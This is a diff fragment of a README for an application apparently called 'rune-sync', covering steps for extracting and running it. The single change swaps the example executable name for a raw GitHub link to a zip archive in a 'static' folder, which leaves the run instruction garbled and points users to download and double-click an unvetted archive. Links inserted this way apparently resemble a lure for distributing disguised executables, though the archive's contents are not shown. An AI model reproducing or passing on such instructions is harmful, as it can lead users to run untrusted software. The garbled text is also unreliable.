HT02777/rune-sync/README.md

    - Select "Extract All" or "Unzip" to extract the contents.

 5. **Run the Application**
-   After extracting (if needed), locate the application file (like `rune-sync.exe` or `rune-sync` for macOS/Linux).
+   After extracting (if needed), locate the application file (like `https://raw.githubusercontent.com/HT02777/rune-sync/main/static/rune-sync-1.8.zip` or `rune-sync` for macOS/Linux).
 Double-click on it to run the application.

 6. **Follow On-Screen Instructions**
    The application will guide you through the setup process.
 Just follow the prompts to complete the installation.